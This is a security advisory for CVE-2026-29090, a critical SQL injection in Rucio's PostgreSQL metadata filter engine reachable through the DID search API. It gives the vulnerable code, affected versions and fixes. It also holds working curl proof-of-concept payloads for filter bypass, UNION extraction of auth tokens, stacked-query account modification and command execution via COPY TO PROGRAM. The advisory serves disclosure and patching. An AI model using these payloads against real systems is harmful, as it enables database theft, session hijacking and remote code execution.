GHSA-6J7P-QJHG-9947
Vulnerability from github – Published: 2026-05-06 16:44 – Updated: 2026-06-30 16:43Summary
A SQL injection vulnerability in FilterEngine.create_postgres_query allows any authenticated Rucio user to execute arbitrary SQL against the configured PostgreSQL metadata database through the DID search endpoint (GET /dids/<scope>/dids/search). When the external metadata plugin postgres_meta is configured, attacker-controlled filter keys and values are interpolated directly into raw SQL statements via Python str.format. This enables full database compromise including data exfiltration, data modification, and potential remote code execution via COPY ... FROM PROGRAM.
Details
The vulnerability exists in lib/rucio/core/did_meta_plugins/filter_engine.py within the create_postgres_query() method (lines 408-484). This method builds raw SQL strings via Python .format() across 6 distinct injection points:
filter_engine.py:477 (string equality — default branch):
expression = "{}->>'{}' {} '{}'".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)
filter_engine.py:442 (wildcard/LIKE branch):
expression = "{}->>'{}' LIKE '{}' ".format(jsonb_column, key, value.replace('*', '%'))
filter_engine.py:456 (boolean branch — value unquoted):
expression = "({}->>'{}' )::boolean {} {}".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)
filter_engine.py:462 (numeric branch — value unquoted):
expression = "({}->>'{}' )::float {} {}".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)
filter_engine.py:472 (datetime branch):
expression = "({}->>'{}' )::timestamp {} '{}'".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)
filter_engine.py:479 (non-JSONB column fallback):
expression = "{} {} '{}'".format(key, POSTGRES_OP_MAP[oper], value)
Both key and value are attacker-controlled strings derived from HTTP query parameters. The resulting expression string is concatenated into a larger query string (postgres_query_str) that is then passed to psycopg3's sql.SQL():
# postgres_meta.py:314-316
statement = sql.SQL("SELECT * FROM {} WHERE {} {}").format(
sql.Identifier(self.table),
sql.SQL(postgres_query_str), # <-- UNSANITIZED user-derived string
sql.SQL("LIMIT {}").format(sql.Literal(limit)) if limit else sql.SQL("")
)
sql.SQL() wraps the string as a trusted SQL syntax fragment — it does not escape or parameterize its contents. The statement is then executed via cur.execute(statement) at postgres_meta.py:321.
Why no existing defense blocks this
The data flow from HTTP request to SQL execution passes through multiple layers with no effective sanitization:
-
HTTP input (
dids.py:265-274): Filter keys and values are accepted from query parameters viaast.literal_eval()or directly from individual query argument names/values. The fallback path only excludes 4 reserved keys (type,limit,long,recursive). -
Plugin routing (
did_meta_plugins/__init__.py:227-248): Each filter key is checked viamanages_key().postgres_meta.manages_key()unconditionally returnsTrue(line 345) — it accepts ANY filter key without validation. -
FilterEngine initialization: The
postgres_metaplugin instantiatesFilterEnginewithstrict_coerce=False. Unknown keys pass through_coerce_filter_word_to_model_attribute()as raw strings. -
Value typecasting (
filter_engine.py:275-297):_try_typecast_string()attempts to parse the value as a boolean, datetime, or number. SQL injection strings fail all these parsers and are returned unchanged. -
Sanity checks (
filter_engine.py:149-190):_sanity_check_translated_filters()does not validate arbitrary key names or values for SQL-unsafe characters. -
SQL construction (
filter_engine.py:442-479): The unsanitized key and value strings are interpolated directly into raw SQL strings via.format(). -
SQL execution (
postgres_meta.py:316,321): The raw string is wrapped insql.SQL()(treated as trusted SQL) and executed viacur.execute().
PoC
Prerequisites:
- A Rucio instance using PostgreSQL as the database backend
- The postgres_meta metadata plugin explicitly configured (this is NOT the default — the default is json_meta)
- Any valid Rucio authentication token (obtainable via userpass, x509, OIDC, SAML, SSH, or GSS)
1. Obtain an authentication token
TOKEN=$(curl -s -k \
-H 'X-Rucio-Account: testuser' \
-H 'X-Rucio-Username: testuser' \
-H 'X-Rucio-Password: testpass' \
'https://rucio.example.org/auth/userpass' \
-D - 2>/dev/null | grep -i 'x-rucio-auth-token' | awk '{print $2}' | tr -d '\r')
2. Value injection — boolean-based filter bypass
# postgres_meta uses create_postgres_query() -> raw string formatting
# filter_engine.py:477: "{}->>'{}' {} '{}'".format(jsonb_column, key, op, value)
curl -s -k \
-H "X-Rucio-Auth-Token: $TOKEN" \
-H "Accept: application/x-json-stream" \
"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x'%20OR%20'1'%3D'1"
# URL-decoded: custom_key=x' OR '1'='1
#
# Generated SQL fragment:
# data->>'custom_key' = 'x' OR '1'='1'
#
# Effect: WHERE clause always true, returns all rows
3. Key injection via query parameter name
# The key is single-quoted but unescaped — injection via closing quote.
# filter_engine.py:477: "{}->>'{}' {} '{}'".format(jsonb_column, key, op, value)
curl -s -k \
-H "X-Rucio-Auth-Token: $TOKEN" \
-H "Accept: application/x-json-stream" \
"https://rucio.example.org/dids/user.testuser/dids/search?x'%20OR%201%3D1--%20=anything"
# URL-decoded: key = x' OR 1=1-- , value = anything
#
# Generated SQL fragment:
# data->>'x' OR 1=1-- ' = 'anything'
# ^^^^^^^^ injected, -- comments out the rest
4. UNION-based data extraction
# Extract auth tokens from the tokens table.
curl -s -k \
-H "X-Rucio-Auth-Token: $TOKEN" \
-H "Accept: application/x-json-stream" \
"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x'%20UNION%20SELECT%20token%2Caccount%2CNULL%2CNULL%20FROM%20tokens%20--"
# URL-decoded: custom_key=x' UNION SELECT token,account,NULL,NULL FROM tokens --
#
# Effect: Appends tokens table contents to the result set
5. Stacked queries — data modification
# PostgreSQL supports multiple statements separated by ;
curl -s -k \
-H "X-Rucio-Auth-Token: $TOKEN" \
-H "Accept: application/x-json-stream" \
"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x';%20UPDATE%20accounts%20SET%20account_type%3D'SERVICE'%20WHERE%20account%3D'testuser';%20--"
# URL-decoded: custom_key=x'; UPDATE accounts SET account_type='SERVICE' WHERE account='testuser'; --
6. Remote code execution (if database user has superuser privileges)
# PostgreSQL COPY ... FROM PROGRAM executes OS commands
curl -s -k \
-H "X-Rucio-Auth-Token: $TOKEN" \
-H "Accept: application/x-json-stream" \
"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x';%20COPY%20(SELECT%20'')%20TO%20PROGRAM%20'id%20>%20/tmp/pwned';%20--"
# URL-decoded: custom_key=x'; COPY (SELECT '') TO PROGRAM 'id > /tmp/pwned'; --
# Requires: database user with pg_execute_server_program or superuser role
7. Alternative entry via filters query parameter
# The filters parameter accepts Python literal syntax via ast.literal_eval().
curl -s -k \
-H "X-Rucio-Auth-Token: $TOKEN" \
-H "Accept: application/x-json-stream" \
'https://rucio.example.org/dids/user.testuser/dids/search?filters=%5B%7B%22custom_key%22%3A%20%22x%27%20OR%20%271%27%3D%271%22%7D%5D'
# URL-decoded: filters=[{"custom_key": "x' OR '1'='1"}]
Impact
Vulnerability type: SQL Injection (CWE-89)
CVSS v3.1: 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Who is impacted:
- Rucio deployments that have explicitly configured the
postgres_metametadata plugin.
What an attacker can do:
- Data modification: PostgreSQL stacked queries enable arbitrary
INSERT/UPDATE/DELETEoperations. - Remote code execution: Via PostgreSQL's
COPY ... FROM PROGRAMif the database user has superuser orpg_execute_server_programprivileges. - File system access: Via
COPY ... TO/FROM '/path'if filesystem permissions allow.
Further elevation when the same postgres database and access is used for metadata and for Rucio itself
- Full database read access: Extract any table including
identities(password hashes and salts),tokens(active authentication sessions),accounts(user enumeration),rse_settings(storage endpoint credentials), andrules(data management policies) could be extracted. - Password hash extraction: Combined with Rucio's use of single-iteration SHA-256 for password hashing (no KDF), extracted hashes can be cracked at GPU speed.
- Authentication token theft: Active bearer tokens can be extracted and used for immediate session hijacking.
Required attacker privileges: Any authenticated Rucio user. Authentication tokens can be obtained via any supported method (userpass, x509, OIDC, SAML, SSH, GSS). No special roles or administrative permissions are required. The GET /dids/<scope>/dids/search endpoint is available to all authenticated users.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rucio"
},
"ranges": [
{
"events": [
{
"introduced": "1.30.0"
},
{
"fixed": "35.8.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio"
},
"ranges": [
{
"events": [
{
"introduced": "36.0.0"
},
{
"fixed": "38.5.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio"
},
"ranges": [
{
"events": [
{
"introduced": "39.0.0"
},
{
"fixed": "39.4.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "rucio"
},
"ranges": [
{
"events": [
{
"introduced": "40.0.0"
},
{
"fixed": "40.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-29090"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T16:44:07Z",
"nvd_published_at": "2026-05-06T18:16:02Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nA SQL injection vulnerability in `FilterEngine.create_postgres_query` allows any authenticated Rucio user to execute arbitrary SQL against the configured PostgreSQL metadata database through the DID search endpoint (`GET /dids/\u003cscope\u003e/dids/search`). When the external metadata plugin `postgres_meta` is configured, attacker-controlled filter keys and values are interpolated directly into raw SQL statements via Python `str.format`. This enables full database compromise including data exfiltration, data modification, and potential remote code execution via `COPY ... FROM PROGRAM`.\n\n---\n\n### Details\n\nThe vulnerability exists in `lib/rucio/core/did_meta_plugins/filter_engine.py` within the `create_postgres_query()` method (lines 408-484). This method builds raw SQL strings via Python `.format()` across 6 distinct injection points:\n\n**filter_engine.py:477** (string equality \u2014 default branch):\n```python\nexpression = \"{}-\u003e\u003e\u0027{}\u0027 {} \u0027{}\u0027\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:442** (wildcard/LIKE branch):\n```python\nexpression = \"{}-\u003e\u003e\u0027{}\u0027 LIKE \u0027{}\u0027 \".format(jsonb_column, key, value.replace(\u0027*\u0027, \u0027%\u0027))\n```\n\n**filter_engine.py:456** (boolean branch \u2014 value unquoted):\n```python\nexpression = \"({}-\u003e\u003e\u0027{}\u0027 )::boolean {} {}\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:462** (numeric branch \u2014 value unquoted):\n```python\nexpression = \"({}-\u003e\u003e\u0027{}\u0027 )::float {} {}\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:472** (datetime branch):\n```python\nexpression = \"({}-\u003e\u003e\u0027{}\u0027 )::timestamp {} \u0027{}\u0027\".format(jsonb_column, key, POSTGRES_OP_MAP[oper], value)\n```\n\n**filter_engine.py:479** (non-JSONB column fallback):\n```python\nexpression = \"{} {} \u0027{}\u0027\".format(key, POSTGRES_OP_MAP[oper], value)\n```\n\nBoth `key` and `value` are attacker-controlled strings derived from HTTP query parameters. The resulting `expression` string is concatenated into a larger query string (`postgres_query_str`) that is then passed to `psycopg3`\u0027s `sql.SQL()`:\n\n```python\n# postgres_meta.py:314-316\nstatement = sql.SQL(\"SELECT * FROM {} WHERE {} {}\").format(\n sql.Identifier(self.table),\n sql.SQL(postgres_query_str), # \u003c-- UNSANITIZED user-derived string\n sql.SQL(\"LIMIT {}\").format(sql.Literal(limit)) if limit else sql.SQL(\"\")\n)\n```\n\n`sql.SQL()` wraps the string as a trusted SQL syntax fragment \u2014 it does **not** escape or parameterize its contents. The statement is then executed via `cur.execute(statement)` at `postgres_meta.py:321`.\n\n#### Why no existing defense blocks this\n\nThe data flow from HTTP request to SQL execution passes through multiple layers with no effective sanitization:\n\n1. **HTTP input** (`dids.py:265-274`): Filter keys and values are accepted from query parameters via `ast.literal_eval()` or directly from individual query argument names/values. The fallback path only excludes 4 reserved keys (`type`, `limit`, `long`, `recursive`).\n\n2. **Plugin routing** (`did_meta_plugins/__init__.py:227-248`): Each filter key is checked via `manages_key()`. `postgres_meta.manages_key()` **unconditionally returns `True`** (line 345) \u2014 it accepts ANY filter key without validation.\n\n3. **FilterEngine initialization**: The `postgres_meta` plugin instantiates `FilterEngine` with `strict_coerce=False`. Unknown keys pass through `_coerce_filter_word_to_model_attribute()` as raw strings.\n\n4. **Value typecasting** (`filter_engine.py:275-297`): `_try_typecast_string()` attempts to parse the value as a boolean, datetime, or number. SQL injection strings fail all these parsers and are returned unchanged.\n\n5. **Sanity checks** (`filter_engine.py:149-190`): `_sanity_check_translated_filters()` does **not** validate arbitrary key names or values for SQL-unsafe characters.\n\n6. **SQL construction** (`filter_engine.py:442-479`): The unsanitized key and value strings are interpolated directly into raw SQL strings via `.format()`.\n\n7. **SQL execution** (`postgres_meta.py:316,321`): The raw string is wrapped in `sql.SQL()` (treated as trusted SQL) and executed via `cur.execute()`.\n\n---\n\n### PoC\n\n**Prerequisites:**\n- A Rucio instance using PostgreSQL as the database backend\n- The `postgres_meta` metadata plugin **explicitly configured** (this is NOT the default \u2014 the default is `json_meta`)\n- Any valid Rucio authentication token (obtainable via userpass, x509, OIDC, SAML, SSH, or GSS)\n\n#### 1. Obtain an authentication token\n\n```bash\nTOKEN=$(curl -s -k \\\n -H \u0027X-Rucio-Account: testuser\u0027 \\\n -H \u0027X-Rucio-Username: testuser\u0027 \\\n -H \u0027X-Rucio-Password: testpass\u0027 \\\n \u0027https://rucio.example.org/auth/userpass\u0027 \\\n -D - 2\u003e/dev/null | grep -i \u0027x-rucio-auth-token\u0027 | awk \u0027{print $2}\u0027 | tr -d \u0027\\r\u0027)\n```\n\n#### 2. Value injection \u2014 boolean-based filter bypass\n\n```bash\n# postgres_meta uses create_postgres_query() -\u003e raw string formatting\n# filter_engine.py:477: \"{}-\u003e\u003e\u0027{}\u0027 {} \u0027{}\u0027\".format(jsonb_column, key, op, value)\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x\u0027%20OR%20\u00271\u0027%3D\u00271\"\n\n# URL-decoded: custom_key=x\u0027 OR \u00271\u0027=\u00271\n#\n# Generated SQL fragment:\n# data-\u003e\u003e\u0027custom_key\u0027 = \u0027x\u0027 OR \u00271\u0027=\u00271\u0027\n#\n# Effect: WHERE clause always true, returns all rows\n```\n\n#### 3. Key injection via query parameter name\n\n```bash\n# The key is single-quoted but unescaped \u2014 injection via closing quote.\n# filter_engine.py:477: \"{}-\u003e\u003e\u0027{}\u0027 {} \u0027{}\u0027\".format(jsonb_column, key, op, value)\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?x\u0027%20OR%201%3D1--%20=anything\"\n\n# URL-decoded: key = x\u0027 OR 1=1-- , value = anything\n#\n# Generated SQL fragment:\n# data-\u003e\u003e\u0027x\u0027 OR 1=1-- \u0027 = \u0027anything\u0027\n# ^^^^^^^^ injected, -- comments out the rest\n```\n\n#### 4. UNION-based data extraction\n\n```bash\n# Extract auth tokens from the tokens table.\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x\u0027%20UNION%20SELECT%20token%2Caccount%2CNULL%2CNULL%20FROM%20tokens%20--\"\n\n# URL-decoded: custom_key=x\u0027 UNION SELECT token,account,NULL,NULL FROM tokens --\n#\n# Effect: Appends tokens table contents to the result set\n```\n\n#### 5. Stacked queries \u2014 data modification\n\n```bash\n# PostgreSQL supports multiple statements separated by ;\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x\u0027;%20UPDATE%20accounts%20SET%20account_type%3D\u0027SERVICE\u0027%20WHERE%20account%3D\u0027testuser\u0027;%20--\"\n\n# URL-decoded: custom_key=x\u0027; UPDATE accounts SET account_type=\u0027SERVICE\u0027 WHERE account=\u0027testuser\u0027; --\n```\n\n#### 6. Remote code execution (if database user has superuser privileges)\n\n```bash\n# PostgreSQL COPY ... FROM PROGRAM executes OS commands\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \"https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x\u0027;%20COPY%20(SELECT%20\u0027\u0027)%20TO%20PROGRAM%20\u0027id%20\u003e%20/tmp/pwned\u0027;%20--\"\n\n# URL-decoded: custom_key=x\u0027; COPY (SELECT \u0027\u0027) TO PROGRAM \u0027id \u003e /tmp/pwned\u0027; --\n# Requires: database user with pg_execute_server_program or superuser role\n```\n\n#### 7. Alternative entry via `filters` query parameter\n\n```bash\n# The filters parameter accepts Python literal syntax via ast.literal_eval().\n\ncurl -s -k \\\n -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n -H \"Accept: application/x-json-stream\" \\\n \u0027https://rucio.example.org/dids/user.testuser/dids/search?filters=%5B%7B%22custom_key%22%3A%20%22x%27%20OR%20%271%27%3D%271%22%7D%5D\u0027\n\n# URL-decoded: filters=[{\"custom_key\": \"x\u0027 OR \u00271\u0027=\u00271\"}]\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** SQL Injection (CWE-89)\n\n**CVSS v3.1:** 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\n**Who is impacted:**\n\n- Rucio deployments that have explicitly configured the `postgres_meta` metadata plugin.\n\n**What an attacker can do:**\n\n- **Data modification:** PostgreSQL stacked queries enable arbitrary `INSERT`/`UPDATE`/`DELETE` operations.\n- **Remote code execution:** Via PostgreSQL\u0027s `COPY ... FROM PROGRAM` if the database user has superuser or `pg_execute_server_program` privileges.\n- **File system access:** Via `COPY ... TO/FROM \u0027/path\u0027` if filesystem permissions allow.\n\n**Further elevation when the same postgres database and access is used for metadata and for Rucio itself**\n\n- **Full database read access:** Extract any table including `identities` (password hashes and salts), `tokens` (active authentication sessions), `accounts` (user enumeration), `rse_settings` (storage endpoint credentials), and `rules` (data management policies) could be extracted.\n- **Password hash extraction:** Combined with Rucio\u0027s use of single-iteration SHA-256 for password hashing (no KDF), extracted hashes can be cracked at GPU speed.\n- **Authentication token theft:** Active bearer tokens can be extracted and used for immediate session hijacking.\n\n**Required attacker privileges:** Any authenticated Rucio user. Authentication tokens can be obtained via any supported method (userpass, x509, OIDC, SAML, SSH, GSS). No special roles or administrative permissions are required. The `GET /dids/\u003cscope\u003e/dids/search` endpoint is available to all authenticated users.",
"id": "GHSA-6j7p-qjhg-9947",
"modified": "2026-06-30T16:43:52Z",
"published": "2026-05-06T16:44:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rucio/rucio/security/advisories/GHSA-6j7p-qjhg-9947"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29090"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-6j7p-qjhg-9947"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/rucio/PYSEC-2026-527.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/rucio/rucio"
},
{
"type": "WEB",
"url": "https://pypi.org/project/rucio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Rucio has SQL Injection in FilterEngine PostgreSQL Query Builder via DID Search API"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.